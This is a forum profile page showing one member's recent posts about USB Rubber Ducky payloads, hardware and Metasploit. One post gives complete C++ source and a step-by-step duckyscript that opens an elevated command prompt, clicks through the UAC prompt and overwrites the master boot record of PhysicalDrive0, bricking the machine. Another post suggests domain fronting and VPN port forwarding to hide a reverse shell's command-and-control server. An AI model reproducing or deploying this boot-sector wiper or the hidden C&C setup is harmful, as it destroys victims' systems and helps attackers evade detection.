Jump to content

ThoughtfulDev

Active Members
  • Posts

    66
  • Joined

  • Last visited

  • Days Won

    1

1 Follower

Contact Methods

  • Website URL
    https://thoughtful-dev.com

Profile Information

  • Gender
    Not Telling
  • Location
    Krypton

Recent Profile Visitors

1,778 profile views

ThoughtfulDev's Achievements

Newbie

Newbie (1/14)

  1. How about using Domain Fronting? You can connect your C&C Server to a VPN with port forwarding and then let the shell connec to that port on the vpn side which will then be forwarded to your C&C... in theory.
  2. be quiet! Silent Base 800 Black, No Window ASUS Prime X370-Pro AMD Ryzen 7 1700X 2x8GB Vengeance DDR4-3200 be quiet! Silent Loop 120mm MSI GTX 770 Samsung 850 Evo 250GB SSD 550 Watt Corsair Semi Modular PSU (dont know the actual name rn) Wanted to buy a new GPU for Machine Learning but prices are so damn high...
  3. Did you changed the Keyboard layout to "es" when compiling the duckyscript?
  4. Reminds me of my PyDuckGen. But seems like your script works ;) (I have a look if i can improve your script)
  5. I guess that this is not possible since no driver is loaded and/or can be installed if you arent on win/linux/osx
  6. this is wrong no quotes and = are needed to it should look like this: STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS
  7. that would be possible if he were using a BashBunny haha :) since the ducky is only a HID this wont work directly on the ducky.
  8. As far as i know the ducky cant do that on it self. maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that and the ducky just presses CTRL+V to copy that random character?
  9. The intel ones do work with e.g Gallium OS(which is ubuntu + the necessary chromebook drivers). (use it myself)
  10. I dont get your problem? Session 1 was opened...so just use sessions to list your sessions and interact with them. This is basic metasploit stuff... maybe you should have a look at metasploit minute.
  11. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING) I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS. CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM 1. Download the precompiled boot.exe (source code is here if you want to compile yourself): #include <windows.h> #include <conio.h> #include <iostream> int main(int argc, char* argv[]){ DWORD dw; char *pathToBin = "boot.bin"; HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (drive != INVALID_HANDLE_VALUE){ HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); if (binary != INVALID_HANDLE_VALUE){ DWORD size = GetFileSize(binary, 0); if (size > 0){ byte *mbr = new byte[size]; if (ReadFile(binary, mbr, size, &dw, 0)){ std::cout << "Binary file successfuly read!" << std::endl; if (WriteFile(drive, mbr, size, &dw, 0)){ std::cout << "First sector overritten successfuly!" << std::endl; } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl; } else std::cerr << "Error reading from binary file!" << std::endl; } else std::cerr << "Invalid binary file!" << std::endl; } else{ std::cerr << "Can't find the binary file to read from!" << std::endl; } CloseHandle(binary); } else std::cerr << "Administrator privileges required!" << std::endl; CloseHandle(drive); return 0; } 2. Create Folder exec on your ducky sdcard and copy boot.exe into it. 3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin 4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY): REM I am NOT responsible for ANY DAMAGE REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr DELAY 5000 ESCAPE DELAY 500 CONTROL ESCAPE DELAY 500 STRING cmd DELAY 500 CTRL-SHIFT ENTER DELAY 1000 REM replace with desired uac alt + key kombo (y for yes in english , j for german etc) ALT y DELAY 1500 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a ENTER DELAY 300 STRING cd exec ENTER DELAY 300 STRING boot.exe ENTER DELAY 1000 STRING exit ENTER I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier boot.exe
  12. try encoding in your keyboard layout (default is US)
  13. You can run powershell and cmd without admin privs or am i mistaken? e.g ctrl +r and then powershell/cmd.exe will run the it without admin privs.
×
×
  • Create New...